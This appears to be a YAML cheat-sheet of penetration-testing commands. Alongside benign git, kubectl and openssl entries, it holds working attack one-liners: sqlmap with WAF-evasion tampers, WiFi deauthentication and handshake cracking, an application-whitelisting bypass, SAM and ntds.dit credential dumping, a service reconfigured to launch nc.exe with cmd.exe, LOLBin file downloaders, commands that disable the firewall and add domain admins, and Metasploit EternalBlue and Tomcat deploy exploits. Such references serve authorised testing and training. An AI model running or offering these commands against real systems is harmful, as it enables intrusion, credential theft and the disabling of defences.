- cmd: sqlmap -u '<url>' --level=5 --risk=3 -p '<parameter>' --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords
lang: sh
tags: sql injection
desc: sqlmap - hardcore
- cmd: sqlmap -u <url> --dbms=MYSQL tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes
lang: sh
tags: sql injection
desc: sqlmap - mysql tamper list
- cmd: sqlmap -u <url> --dbms=MSSQL tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor
lang: sh
tags: sql injection
desc: sqlmap - mssql tamper list
- cmd: cve-bin-tool <target>
lang: sh
tags: pentest
desc: cve-bin-tool - scan target (file or directory) to detect versions and CVEs of embedded open source components
- cmd: cve-bin-tool --offline <target>
lang: sh
tags: pentest
desc: cve-bin-tool - offline scan
- cmd: cve-bin-tool -r <component> <target>
lang: sh
tags: pentest
desc: cve-bin-tool - scan for a given open source component (e.g. openssl)
- cmd: cve-bin-tool -f html <target>
lang: sh
tags: pentest
desc: cve-bin-tool - build HTML report
- cmd: docker run --rm -it -v `pwd`:/tmp/EyeWitness eyewitness --web -x /tmp/EyeWitness/<nmap_file>.xml --prepend-https
lang: sh
tags: pentest
desc: eyewitness - web screenshots
- cmd: docker run --rm -v $(pwd):/data -p7171:7171 leonjza/gowitness gowitness nmap -f /data/<nmap_file>.xml
lang: sh
tags: pentest
desc: gowitness - web screenshots (nmap xml file)
- cmd: docker run --rm -v $(pwd):/data -p7171:7171 leonjza/gowitness gowitness file -f /data/<file>
lang: sh
tags: pentest
desc: gowitness - web screenshots (file containing urls)
- cmd: nmap -sn <ip_range>
lang: sh
tags: pentest
desc: nmap - hosts alive
- cmd: nmap -sC -sV <ip>
lang: sh
tags: pentest
desc: nmap - classic scan
- cmd: nmap -iL <targets_file>
lang: sh
tags: pentest
desc: nmap - read targets from a file
- cmd: nmap -sC -sV -oA <output_file> <ip>
lang: sh
tags: pentest
desc: nmap - classic scan + save
- cmd: nmap --top-ports 100 --open -sV <ip>
lang: sh
tags: pentest
desc: nmap - quick scan top ports 100
- cmd: nmap --top-ports 5000 --open -sV <ip>
lang: sh
tags: pentest
desc: nmap - big top ports 5000
- cmd: nmap -p- -sV <ip>
lang: sh
tags: pentest
desc: nmap - full port
- cmd: nmap <ip> -p<port_list> --open
lang: sh
tags: pentest
desc: nmap - host with a given port
- cmd: IP=<ip>; ; ports=$(nmap -p- --min-rate=1000 -n -T4 $IP | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//); ; nmap -Pn -sC -sV -p$ports $IP -oN scan.txt --reason --script=vuln
lang: sh
tags: pentest
desc: nmap - FULL
- cmd: nmap -sU <ip>
lang: sh
tags: pentest
desc: nmap - udp scan
- cmd: nmap --max-rate 100 -sC -sV <ip>
lang: sh
tags: pentest
desc: nmap - low rate Classic
- cmd: masscan -p 1-65535 <ip> -e <dev> --rate=1000
lang: sh
tags: pentest
desc: massscan - full port
- cmd: nmap -Pn -sS -T4 --open --script smb-security-mode -p445 <ip>
lang: sh
tags: pentest
desc: nmap - SMB signing disabled
- cmd: proxychains nmap -n -sT -sV -Pn --open -oA <output_file> -iL <targets_file>
lang: sh
tags: pentest
desc: nmap behind proxy - tcp connect (-sT) - no dns (-n)
- cmd: service --status-all
lang: sh
tags: pentest
desc: List services
- cmd: service <service_name> status
lang: sh
tags: pentest
desc: Status of a service
- cmd: service <service_name> start
lang: sh
tags: pentest
desc: Start a service
- cmd: service <service_name> stop
lang: sh
tags: pentest
desc: Stop a service
- cmd: service <service_name> restart
lang: sh
tags: pentest
desc: Restart a service
- cmd: systemctl start <service_inactive>
lang: sh
tags: systemctl, service
desc: Start service
- cmd: systemctl stop <service_active>
lang: sh
tags: systemctl, service
desc: Stop service
- cmd: systemctl enable <service_disabled>
lang: sh
tags: systemctl, service
desc: Enable service
- cmd: systemctl disable <service_enabled>
lang: sh
tags: systemctl, service
desc: Disable service
- cmd: systemctl restart <service>
lang: sh
tags: systemctl, service
desc: Restart service
- cmd: systemctl reload <service_active>
lang: sh
tags: systemctl, service
desc: Reload service
- cmd: systemctl status <service>
lang: sh
tags: systemctl, service
desc: Service status
- cmd: systemctl list-units --type=service --state=running
lang: sh
tags: systemctl, service
desc: List running services
- cmd: systemctl list-unit-files --type=service --state=enabled
lang: sh
tags: systemctl, service
desc: List enabled services
- cmd: systemctl list-unit-files --type=service --state=disabled
lang: sh
tags: systemctl, service
desc: List disabled services
- cmd: git config --global user.name <name>
lang: sh
tags: pentest
desc: Set global git user name
- cmd: git config --global user.email <email>
lang: sh
tags: pentest
desc: Set global git user email
- cmd: git init
lang: sh
tags: pentest
desc: Initializes a git repository
- cmd: git clone -b <branch_name> <repository> <clone_directory>
lang: sh
tags: pentest
desc: Clone a git repository
- cmd: git remote --verbose
lang: sh
tags: pentest
desc: View all available remote for a git repository
- cmd: git remote add <remote_name> <remote_url>
lang: sh
tags: pentest
desc: Adds a remote for a git repository
- cmd: git remote rename <old_remote_name> <new_remote_name>
lang: sh
tags: pentest
desc: Renames a remote for a git repository
- cmd: git remote remove <remote_name>
lang: sh
tags: pentest
desc: Remove a remote for a git repository
- cmd: git checkout <branch>
lang: sh
tags: pentest
desc: Checkout to branch
- cmd: git status
lang: sh
tags: pentest
desc: Displays the current status of a git repository
- cmd: git diff <unstaged_files>
lang: sh
tags: pentest
desc: Displays unstaged changes for file
- cmd: git add <changed_files>;
lang: sh
tags: pentest
desc: Stage single or multiple files
- cmd: git add -A
lang: sh
tags: pentest
desc: Stage all files in project
- cmd: git commit -m <message>
lang: sh
tags: pentest
desc: Saves the changes to a file in a commit
- cmd: git push -u <remote_name> <branch_name>
lang: sh
tags: pentest
desc: Pushes committed changes to remote repository
- cmd: git push <remote_name> <branch>:<branch_to_overwrite>
lang: sh
tags: pentest
desc: Pushes changes to a remote repository overwriting another branch
- cmd: git push <remote_name> <branch_name> -f
lang: sh
tags: pentest
desc: Overwrites remote branch with local branch changes
- cmd: git pull --ff-only
lang: sh
tags: pentest
desc: Pulls changes to a remote repo to the local repo
- cmd: git merge <branch_name>
lang: sh
tags: pentest
desc: Merges changes on one branch into current branch
- cmd: git merge --abort
lang: sh
tags: pentest
desc: Abort the current conflict resolution process, and try to reconstruct the pre-merge state.
- cmd: git log
lang: sh
tags: pentest
desc: Displays log of commits for a repo
- cmd: git log --all --decorate --oneline --graph
lang: sh
tags: pentest
desc: Displays formatted log of commits for a repo
- cmd: git clean -dxf
lang: sh
tags: pentest
desc: Clear everything
- cmd: git rebase master -S -f
lang: sh
tags: pentest
desc: Sign all commits in a branch based on master
- cmd: git fetch origin pull/<pr_number>/head:pr/<pr_number> && git checkout pr/<pr_number>
lang: sh
tags: pentest
desc: Checkout a branch from a fork
- cmd: git submodule add <repository> <path>
lang: sh
tags: pentest
desc: Add a new module
- cmd: git submodule update --init
lang: sh
tags: pentest
desc: Update module
- cmd: git submodule update
lang: sh
tags: pentest
desc: Update module without init
- cmd: git submodule foreach git pull origin master
lang: sh
tags: pentest
desc: Pull all submodules
- cmd: git submodule update --init --recursive
lang: sh
tags: pentest
desc: Update all submodules
- cmd: git commit --no-verify
lang: sh
tags: pentest
desc: Skip git hooks
- cmd: git checkout -b <new_branch_name>
lang: sh
tags: pentest
desc: Create new branch from current HEAD
- cmd: git checkout -b <new_branch_name> <remote>/<branch_name>
lang: sh
tags: pentest
desc: pull remote branch and switch to it
- cmd: gitdumper <url>/.git/ <destination_dir>
lang: sh
tags: pentest
desc: git dump
- cmd: kubectl config get-contexts
lang: sh
tags: kubernetes, k8s, kubectl
desc: Print all contexts
- cmd: kubectl config current-context
lang: sh
tags: kubernetes, k8s, kubectl
desc: Print current context of kubeconfig
- cmd: kubectl config use-context <context>
lang: sh
tags: kubernetes, k8s, kubectl
desc: Set context of kubeconfig
- cmd: kubectl explain <resource>
lang: sh
tags: kubernetes, k8s, kubectl
desc: Print resource documentation
- cmd: kubectl get nodes
lang: sh
tags: kubernetes, k8s, kubectl
desc: Get nodes (add option '-o wide' for details)
- cmd: kubectl get namespaces
lang: sh
tags: kubernetes, k8s, kubectl
desc: Get namespaces
- cmd: kubectl get pods -n <namespace>
lang: sh
tags: kubernetes, k8s, kubectl
desc: Get pods from namespace (add option '-o wide' for details)
- cmd: kubectl get pods --all-namespaces
lang: sh
tags: kubernetes, k8s, kubectl
desc: Get pods from all namespace (add option '-o wide' for details)
- cmd: kubectl get services -n <namespace>
lang: sh
tags: kubernetes, k8s, kubectl
desc: Get services from namespace
- cmd: kubectl describe <resource>/<name> -n <namespace>
lang: sh
tags: kubernetes, k8s, kubectl
desc: Get details from resource on namespace
- cmd: kubectl logs -f pods/<name> -n <namespace>
lang: sh
tags: kubernetes, k8s, kubectl
desc: Print logs from namespace
- cmd: kubectl get deployments -n <namespace>
lang: sh
tags: kubernetes, k8s, kubectl
desc: Get deployments
- cmd: kubectl edit deployment/<name> -n <namespace>
lang: sh
tags: kubernetes, k8s, kubectl
desc: Edit deployments
- cmd: kubectl drain <name>
lang: sh
tags: kubernetes, k8s, kubectl
desc: Drain node in preparation for maintenance
- cmd: kubectl uncordon <name>
lang: sh
tags: kubernetes, k8s, kubectl
desc: Mark node as schedulable
- cmd: kubectl cordon <name>
lang: sh
tags: kubernetes, k8s, kubectl
desc: Mark node as unschedulable
- cmd: kubectl top <type>
lang: sh
tags: kubernetes, k8s, kubectl
desc: Display resource (cpu/memory/storage) usage
- cmd: drupwn --users --nodes --modules --dfiles --themes enum <url>
lang: sh
tags: drupal, drupwn
desc: drupwn classic
- cmd: sudo docker run --rm -it immunit/drupwn --users --nodes --modules --dfiles --themes enum <url>
lang: sh
tags: drupal, drupwn
desc: drupwn, docker
- cmd: gobuster dir -u <url> -w <wordlist>
lang: sh
tags: fuzzer, fuzz, gobuster
desc: gobuster scan classic
- cmd: gobuster dir -u <url> -w <wordlist> -x json,html,php,txt,xml,md
lang: sh
tags: fuzzer, fuzz, gobuster
desc: gobuster scan pentest classic fuzz
- cmd: gobuster dir -u <url> -w <wordlist> -t 30
lang: sh
tags: fuzzer, fuzz, gobuster
desc: gobuster scan high rate
- cmd: gobuster dir -u <url> -w <wordlist> -x json,html,php,txt
lang: sh
tags: fuzzer, fuzz, gobuster
desc: gobuster scan with adding extension
- cmd: wfuzz -z range,1-1000 -u <url>FUZZ
lang: sh
tags: fuzzer, fuzz, wfuzz
desc: 'wfuzz with number on url ( url : http://site/ )'
- cmd: wfuzz -z file,<file> -u <url>FUZZ
lang: sh
tags: fuzzer, fuzz, wfuzz
desc: 'wfuzz with wordlist on url ( url : http://site/ )'
- cmd: wfuzz -z file,<file> -X post -u <url> -d 'FUZZ=1'
lang: sh
tags: fuzzer, fuzz, wfuzz
desc: wfuzz on post parameter
- cmd: dirb <url> -w /usr/share/wordlists/dirb/common.txt
lang: sh
tags: fuzzer, fuzz, dirb
desc: dirb commons
- cmd: ffuf -w <wordlist> -u <url>/FUZZ
lang: sh
tags: fuzzer, fuzz, ffuf
desc: ffuf fuzz keyword in url
- cmd: 'ffuf -w <wordlist> -u <url> -H "Host: FUZZ" -fs <response_size>'
lang: sh
tags: fuzzer, fuzz, ffuf
desc: ffuf fuzz Host filter response size
- cmd: ffuf -w <wordlist> -u <url>?<param>=FUZZ -fs <response_size>
lang: sh
tags: fuzzer, fuzz, ffuf
desc: ffuf GET parameter fuzzing
- cmd: ffuf -w <wordlist> -u <url> -X POST -d "username=admin\&password=FUZZ" -fc 401
lang: sh
tags: fuzzer, fuzz, ffuf
desc: ffuf POST parameter fuzzing and filter response code 401
- cmd: nikto -C all -h <url>
lang: sh
tags: fuzzer, fuzz, nikto
desc: nikto - first vuln scan
- cmd: feroxbuster --url <url>
lang: sh
tags: fuzzer, fuzz, ffuf, dirsearch, gobuster, dirb
desc: default scan
- cmd: feroxbuster --url <url> -w <wordlist>
lang: sh
tags: fuzzer, fuzz, ffuf, dirsearch, gobuster, dirb
desc: default scan with wordlist
- cmd: feroxbuster -u <url> -H "<header>" "<header>"
lang: sh
tags: fuzzer, fuzz, ffuf, dirsearch, gobuster, dirb
desc: Multiple headers
- cmd: feroxbuster -u <proto|https>://[<ipv6>] --no-recursion -vv
lang: sh
tags: fuzzer, fuzz, ffuf, dirsearch, gobuster, dirb
desc: IPv6, non-recursive scan with INFO-level logging enabled
- cmd: feroxbuster -u <url> --auto-bail
lang: sh
tags: fuzzer, fuzz, ffuf, dirsearch, gobuster, dirb
desc: Abort or reduce scan speed to individual directory scans when too many errors have occurred
- cmd: 'python3 jwt_tool.py -M at -t "<url>" -rh "Authorization: Bearer <JWT_Token>" -rh "<other_header>" -rc "<cookies>"'
lang: sh
tags: jwttool, token, jwt
desc: Jwt tool Mode all tests
- cmd: python3 jwt_tool.py -Q "<jwttool_id>"
lang: sh
tags: jwttool, token, jwt
desc: Jwt tool reuse query id
- cmd: python3 jwt_tool.py -d <wordlists.txt> <JWT_token>
lang: sh
tags: jwttool, token, jwt
desc: Jwt tool bruteforce key
- cmd: openssl req -new -newkey rsa:<RSA_LENGTH> -nodes -out <OUTPUT_CSR> -keyout <OUTPUT_KEY>
lang: sh
tags: openssl, certificate, encryption
desc: Create a new signing request and key
- cmd: openssl req -x509 -sha256 -nodes -days <VALIDITY> -newkey rsa:<RSA_LENGTH> -out <OUTPUT_CRT> -keyout <OUTPUT_KEY>
lang: sh
tags: openssl, certificate, encryption
desc: Create a new self-signed certificate
- cmd: openssl req -out <OUTPUT_CSR> -key <INPUT_KEY> -new
lang: sh
tags: openssl, certificate, encryption
desc: Create a signing request from existing key
- cmd: openssl x509 -x509toreq -out <OUTPUT_CSR> -in <INPUT_CRT> -signkey <INPUT_KEY>
lang: sh
tags: openssl, certificate, encryption
desc: Create a signing request from existing certificate and key
- cmd: openssl rsa -in <INPUT_KEY> -out <OUTPUT_PLAINTEXT_KEY>
lang: sh
tags: openssl, certificate, encryption
desc: Remove a passphrase from a private key
- cmd: openssl x509 -inform der -in <INPUT_CRT> -out <OUTPUT_PEM>
lang: sh
tags: openssl, certificate, encryption
desc: Convert a DER encoded file to a PEM encoded file
- cmd: openssl x509 -outform der -in <INPUT_PEM> -out <OUTPUT_CRT>
lang: sh
tags: openssl, certificate, encryption
desc: Convert a PEM encoded file to a DER encoded file
- cmd: openssl pkcs12 -in <INPUT_PKCS12> -out <OUTPUT_PEM> -nodes
lang: sh
tags: openssl, certificate, encryption
desc: Convert a PKCS12 encoded file containing a private key and certificates to PEM
- cmd: openssl pkcs12 -in <INPUT_PKCS12> -out <OUTPUT_PEM> -nodes -nocerts
lang: sh
tags: openssl, certificate, encryption
desc: Extract the private key from a PKCS12 encoded file
- cmd: openssl pkcs12 -in <INPUT_PKCS12> -out <OUTPUT_PEM> -nodes -nokeys
lang: sh
tags: openssl, certificate, encryption
desc: Extract the certificate from a PKCS12 encoded file
- cmd: openssl pkcs12 -export -out <OUTPUT_PKCS12> -inkey <INPUT_KEY> -in <INPUT_CRT> -certfile <INPUT_CRT>
lang: sh
tags: openssl, certificate, encryption
desc: Convert a PEM certificate file and a private key to PKCS12 encoded file
- cmd: openssl req -text -noout -verify -in <OUTPUT_CSR>
lang: sh
tags: openssl, certificate, encryption
desc: Validate a certificate signing request
- cmd: openssl rsa -in <INPUT_KEY> -check
lang: sh
tags: openssl, certificate, encryption
desc: Validate a private key
- cmd: openssl x509 -in <INPUT_CRT> -text -noout
lang: sh
tags: openssl, certificate, encryption
desc: Validate a certificate
- cmd: openssl pkcs12 -info -in <INPUT_PKCS12>
lang: sh
tags: openssl, certificate, encryption
desc: Validate a PKCS12 file (.pfx or .p12)
- cmd: openssl x509 -noout -modulus -in <INPUT_CRT> | openssl md5
lang: sh
tags: openssl, certificate, encryption
desc: Compare the MD5 hash of a certificate
- cmd: openssl rsa -noout -modulus -in <INPUT_KEY> | openssl md5
lang: sh
tags: openssl, certificate, encryption
desc: Compare the MD5 hash of a private key
- cmd: openssl req -noout -modulus -in <INPUT_CSR> | openssl md5
lang: sh
tags: openssl, certificate, encryption
desc: Compare the MD5 hash of a certificate signing request
- cmd: openssl s_client -connect <URL>:<PORT>
lang: sh
tags: openssl, certificate, encryption
desc: Display the server certificate chain
- cmd: msfconsole -x "use auxiliary/scanner/http/tomcat_enum"
lang: sh
tags: tomcat
desc: tomcat manager bruteforce
- cmd: msfconsole -x "use exploit/multi/http/tomcat_mgr_deploy"
lang: sh
tags: tomcat
desc: tomcat deploy
- cmd: curl -k -s <url> | grep -o 'http://[^"]*' | cut -d "/" -f 3 | sort -u
lang: sh
tags: web
desc: extract links from an url
- cmd: sudo docker run -it --network host --rm wpscanteam/wpscan --proxy http://127.0.0.1:8080 --url <url> --disable-tls-checks -e ap,tt,cb,dbe,u1-20,m --api-token <wpscan_apitoken>
lang: sh
tags: wpscan, wordpress
desc: wpscan with docker and burp proxy
- cmd: airmon-ng check kill
lang: sh
tags: pentest
desc: airmon - Kill processes which can cause trouble
- cmd: airmon-ng start <wlan_interface>
lang: sh
tags: pentest
desc: airmon - start interface
- cmd: airmon-ng stop <wlanmon_interface>
lang: sh
tags: pentest
desc: airmon - stop interface
- cmd: systemctl restart NetworkManager
lang: sh
tags: pentest
desc: NetworkManager - Restart NetworkManager
- cmd: airodump-ng <wlanmon_interface>
lang: sh
tags: pentest
desc: airodump - listen to everything
- cmd: airodump-ng --bssid <mac_address> -c <channel> -w <output_file> <wlanmon_interface>
lang: sh
tags: pentest
desc: airodump - listen to specific SSID
- cmd: aireplay-ng --deauth <deauth_count> -c <client_mac_address> -a <mac_address> <wlanmon_interface>
lang: sh
tags: pentest
desc: aireplay - deauth client
- cmd: aircrack-ng -w <dictionary> <input_file>
lang: sh
tags: pentest
desc: aircrack - crack handshake for PSK
- cmd: hostapd-wpe <hostapd_conf>
lang: sh
tags: pentest
desc: hostapd-wpe - launch fake AP
- cmd: kismet -c <wlan_interface>
lang: sh
tags: pentest
desc: kismet - monitor WiFi
- cmd: nmcli device set <wlan_interface> managed true
lang: sh
tags: pentest
desc: nmcli - set back WiFi interface to managed mode
- cmd: reaver -i <wlanmon_interface> -b <mac_address> -c <channel> -Z
lang: sh
tags: pentest
desc: reaver - launch WPS pixiedust attack
- cmd: hcxdumptool -i <wlanmon_interface> -o capture.pcapng --enable_status=1 -c <channel>
lang: sh
tags: pentest
desc: hcxdumptool - WPA2-PSK PMKID Capture
- cmd: hcxpcaptool -z test.16800 test.pcapng
lang: sh
tags: pentest
desc: hcxdumptool -
- cmd: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe /logfile= /LogToConsole=false /U <full_path_to_app>
lang: sh
tags: application whitelisting, clm
desc: whitelisting bypass with installutil
- cmd: systeminfo
lang: sh
tags: pentest
desc: get info system
- cmd: systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
lang: sh
tags: pentest
desc: get info system limited
- cmd: findstr /si 'password' *.txt *.xml *.docx
lang: sh
tags: pentest
desc: find passwords
- cmd: findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml
lang: sh
tags: pentest
desc: find passwords - group policy preference (ms14-025)
- cmd: wmic qfe get Caption,Description,HotFixID,InstalledOn
lang: sh
tags: pentest
desc: get patches
- cmd: hostname; $env:computername
lang: sh
tags: pentest
desc: get hostname
- cmd: set
lang: sh
tags: pentest
desc: show environment - List all environment variables
- cmd: nslookup -type=any <userdnsdomain>.
lang: sh
tags: pentest
desc: dns request for DC
- cmd: wmic logicaldisk get caption,description,providername
lang: sh
tags: pentest
desc: show mounted disks
- cmd: dir C:\$Recycle.Bin /s /b
lang: sh
tags: pentest
desc: show recycle bin
- cmd: wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE%
lang: sh
tags: pentest
desc: get architecture
- cmd: schtasks /query /fo LIST /v
lang: sh
tags: pentest
desc: list scheduled tasks
- cmd: schtasks /query /fo LIST 2>nul | findstr <taskname>
lang: sh
tags: pentest
desc: list one scheduled task
- cmd: tasklist /V
lang: sh
tags: pentest
desc: list process
- cmd: tasklist /SVC
lang: sh
tags: pentest
desc: list process and links to started services
- cmd: net start
lang: sh
tags: pentest
desc: list windows service started (1)
- cmd: wmic service list brief
lang: sh
tags: pentest
desc: list services (2)
- cmd: sc query
lang: sh
tags: pentest
desc: list services (3)
- cmd: dir /a "C:\Program Files"
lang: sh
tags: pentest
desc: list installed software (1)
- cmd: dir /a "C:\Program Files (x86)"
lang: sh
tags: pentest
desc: list installed software (2)
- cmd: reg query HKEY_LOCAL_MACHINE\SOFTWARE
lang: sh
tags: pentest
desc: list installed software (3)
- cmd: reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
lang: sh
tags: pentest
desc: show lsa cached credentials value
- cmd: reg query HKLM /f password /t REG_SZ /s
lang: sh
tags: pentest
desc: register query word password (1)
- cmd: reg query HKCU /f password /t REG_SZ /s
lang: sh
tags: pentest
desc: register query word password (2)
- cmd: reg save HKLM\SAM 'C:\Windows\Temp\sam.save'; reg save HKLM\SECURITY 'C:\Windows\Temp\security.save'; reg save HKLM\SYSTEM 'C:\Windows\Temp\system.save'
lang: sh
tags: pentest
desc: register query extract SAM
- cmd: wmic shadowcopy call create Volume='C:\'
lang: sh
tags: pentest
desc: create shadow copy
- cmd: vssadmin list shadows
lang: sh
tags: pentest
desc: list shadow copy
- cmd: accesschk.exe /accepteula -ucqv <service_name>
lang: sh
tags: pentest
desc: check service privilege
- cmd: sc config <service> binpath= "C:\nc.exe -nv 127.0.0.1 4444 -e C:\WINDOWS\System32\cmd.exe"
lang: sh
tags: pentest
desc: reconfigure service
- cmd: sc config <service> obj= ".\LocalSystem" password= ""
lang: sh
tags: pentest
desc: change service
- cmd: net start <service>
lang: sh
tags: pentest
desc: start service
- cmd: accesschk.exe /accepteula -dqv "<file>"
lang: sh
tags: pentest
desc: check permission (1)
- cmd: cacls "<file>"
lang: sh
tags: pentest
desc: check permission (2)
- cmd: accesschk.exe -uwdqs Users <c>:\
lang: sh
tags: pentest
desc: find weak folder permission
- cmd: accesschk.exe -uwqs Users <c>:\
lang: sh
tags: pentest
desc: find weak file permission
- cmd: echo var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false); WinHttpReq.Send(); WScript.Echo(WinHttpReq.ResponseText); > fu.js && cscript /nologo fu.js <file_url> > <downloaded_file>
lang: sh
tags: pentest
desc: VBS download file script
- cmd: net user <username> <password> /ADD
lang: sh
tags: pentest
desc: add user
- cmd: net user <username> <password> /ADD /DOMAIN
lang: sh
tags: pentest
desc: add user to domain
- cmd: net localgroup administrators <username> /add
lang: sh
tags: pentest
desc: add user as admin
- cmd: runas /user:<domain>\<user> cmd.exe
lang: sh
tags: pentest
desc: run as over user
- cmd: whoami /all
lang: sh
tags: pentest
desc: whoami - All info about me, take a look at the enabled tokens
- cmd: whoami /priv
lang: sh
tags: pentest
desc: whoami privilegied
- cmd: net users
lang: sh
tags: pentest
desc: list all users
- cmd: net group "Admins du domaine"
lang: sh
tags: pentest
desc: list domain admins (fr)
- cmd: net user <username>
lang: sh
tags: pentest
desc: infos about a user
- cmd: '[wmi] Win32_userAccount.Domain=<computer_name>,Name="Administrator"'
lang: ps1
tags: pentest
desc: infos on a Administrator and retrieve SID
- cmd: net accounts
lang: sh
tags: pentest
desc: infos about password policy
- cmd: qwinsta
lang: sh
tags: pentest
desc: who logged in
- cmd: cmdkey /list
lang: sh
tags: pentest
desc: List credentials
- cmd: net localgroup
lang: sh
tags: pentest
desc: show local groups
- cmd: net localgroup <group_name>
lang: sh
tags: pentest
desc: show specific local group
- cmd: net group /domain <domain_group_name>
lang: sh
tags: pentest
desc: show domain group users
- cmd: echo %USERDOMAIN%
lang: sh
tags: pentest
desc: get domain name
- cmd: echo %USERDNSDOMAIN%
lang: sh
tags: pentest
desc: get domain name (2)
- cmd: systeminfo | findstr /B /C:"Domain"
lang: sh
tags: pentest
desc: get computer domain name (3)
- cmd: echo %logonserver%
lang: sh
tags: pentest
desc: get name of the DC
- cmd: set logonserver #Get name of the domain controller
lang: sh
tags: pentest
desc: get name of the dc (2)
- cmd: net group /domain
lang: sh
tags: pentest
desc: list of domain groups
- cmd: net group "domain computers" /domain
lang: sh
tags: pentest
desc: list of computer connected to the domain
- cmd: net view /domain; nltest /dclist:<domain>
lang: sh
tags: pentest
desc: List all PCs of the domain
- cmd: net group "Domain Controllers" /domain
lang: sh
tags: pentest
desc: list pc accounts of domain controllers
- cmd: net group "Domain Admins" /domain
lang: sh
tags: pentest
desc: List users with domain admin privileges
- cmd: net group "Domain Admins" <username> /add /domain
lang: sh
tags: pentest
desc: Add user to domain admin group
- cmd: net group "Admins du domaine" <username> /add /domain
lang: sh
tags: pentest
desc: Add user to domain admin group - FR
- cmd: net localgroup administrators /domain
lang: sh
tags: pentest
desc: List users that belongs to the administrators group inside the domain
- cmd: net user /domain
lang: sh
tags: pentest
desc: List all domain users
- cmd: net user <username> /domain
lang: sh
tags: pentest
desc: get user domain information
- cmd: net accounts /domain
lang: sh
tags: pentest
desc: domain password and lockout policy
- cmd: nltest /domain_trusts
lang: sh
tags: pentest
desc: get mapping of the trust relationships
- cmd: ipconfig /all
lang: sh
tags: pentest
desc: all interfaces
- cmd: route print
lang: sh
tags: pentest
desc: print all routes
- cmd: arp -a; netstat -ano
lang: sh
tags: pentest
desc: list of know hosts
- cmd: type C:\WINDOWS\System32\drivers\etc\hosts
lang: sh
tags: pentest
desc: show hosts file
- cmd: dir /a:h <path>
lang: sh
tags: pentest
desc: list hidden files
- cmd: dir /s /b
lang: sh
tags: pentest
desc: Recursive list
- cmd: netsh firewall show state
lang: sh
tags: pentest
desc: show firewall state
- cmd: netsh firewall show config
lang: sh
tags: pentest
desc: show firewall config
- cmd: netsh Advfirewall set allprofiles state off
lang: sh
tags: pentest
desc: turn off firewall
- cmd: netsh firewall set opmode disable
lang: sh
tags: pentest
desc: turn off firewall (2)
- cmd: netsh Advfirewall set allprofiles state on
lang: sh
tags: pentest
desc: turn on firewall
- cmd: netsh firewall add portopening TCP 3389 "Remote Desktop"
lang: sh
tags: pentest
desc: firewall open port RDP
- cmd: ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q
lang: sh
tags: pentest
desc: dump ntds.dit (Windows >= 2008 server) - method 1
- cmd: esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d c:\folder\ntds.dit
lang: sh
tags: pentest
desc: dump ntds.dit (Windows >= 2008 server) - method 2
- cmd: 'net start vss && vssadmin create shadow /for=c: && vssadmin list shadows && copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit C:\temp'
lang: sh
tags: pentest
desc: dump ntds.dit (Windows <= 2003 server)
- cmd: net view
lang: sh
tags: pentest
desc: list of computer
- cmd: net view /all /domain <domain_name>
lang: sh
tags: pentest
desc: list of computer shares on the domain
- cmd: net view \\<ip> \ALL
lang: sh
tags: pentest
desc: list share of a computer
- cmd: 'net use x: \\<ip>\<share_name>'
lang: sh
tags: pentest
desc: mount share locally
- cmd: net share
lang: sh
tags: pentest
desc: check current share
- cmd: '"c:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\mpcmdrun.exe" -DownloadFile -url <url> -path <result_file>; mpcmdrun.exe -DownloadFile -url <url> -path <result_file>'
lang: sh
tags: pentest
desc: windows download file with windows defender
- cmd: nmcli dev show <interface>
lang: sh
tags: pentest
desc: find AD IP - show domain name and dns
- cmd: nslookup -type=SRV _ldap._tcp.dc._msdcs.<domain_name>
lang: sh
tags: pentest
desc: nslookup AD - domain
- cmd: netdom trust <source_domain> /d:<target_domain> /enablesidhistory:yes
lang: sh
tags: pentest
desc: enable sid history
- cmd: msfconsole -x "use exploit/windows/smb/ms17_010_eternalblue"
lang: sh
tags: pentest
desc: windows eternal blue - smb - ms17-010